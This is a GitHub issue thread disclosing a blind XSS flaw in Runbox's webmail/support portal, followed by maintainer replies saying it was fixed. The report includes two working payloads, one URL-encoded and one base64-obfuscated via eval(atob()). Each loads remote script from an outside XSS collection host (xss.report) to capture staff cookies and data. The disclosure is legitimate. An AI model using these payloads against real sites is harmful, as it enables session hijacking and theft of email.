### ISSUE TITLE
Blind XSS in https://*.runbox.com/[redacted].cgi Allows an Attacker to Read all Email/Access Portal using Cookie  for a victim.

### ISSUE THREAD

**Issue by hellofresh01** [runbox/runbox7#1467]
Summary : The support portal suffers from a Blind Cross-site Scripting (XSS) vulnerability. XSS is a vulnerability which occurs when user input is unsafely encorporated into the HTML markup inside of a webpage.
Attackers in BXSS send their payload via email to save their payload into the database (like contact forms, logs, etc.). Then, the attacker waits for a server-side user or team member [who deals with website databases] to open or trigger that script or payload to execute.

Description

Description :
I was testing pentesting for a company using runbox for their mailing system 
When a user sends a email to company staff i.e support@litewhite.org and use a malicious payload in subject/body could leads to leak other customer email and admin cookie

When the employee view the email the blind xss fired revealing employee cookies,operating system, other customers data

ayload Used : 
%22%3E%3CsCRIpt%20sRc%3Dhttps%3A%2F%2Fxss.report%2Fs%2Fmark0r%3E%20%3CIframe%20SrcDoc%3D%22%3CScript%20Src%3Dhttps%3A%2F%2Fxss.report%2Fs%2Fmark0r%3E%3C%2FScript%3E%22%3E
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL21hcmswciI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>

Reproduction Steps : I have used payloads from xss.report [ Blind XSS Service ]
And sended those payload to victim i.e  support@litewhite.org via gmail
Payloads were added in subject and body section
When victim opens the email the payload get executed.

If you have any queries , don't hesitate to ask.

Impact
This vulnerability is extremely dangerous for web applications attackers can access the portal using cookie

DOM File Attached.
Supporting Screenshots Attached.

![s1](https://github.com/runbox/runbox7/assets/81752050/8b7ec5fe-01e2-4efd-8844-35bb5736e1e4)

DOM File : https://pastes.io/evpoahkxpb

**Comment by gtandersen** [comment]
Thank you for this report which we will investigate immediately. We have redacted the screenshot for privacy reasons in the meantime.

**Comment by gtandersen** [comment]
This issue is resolved and will be moved to a private repository because it contains sensitive information.
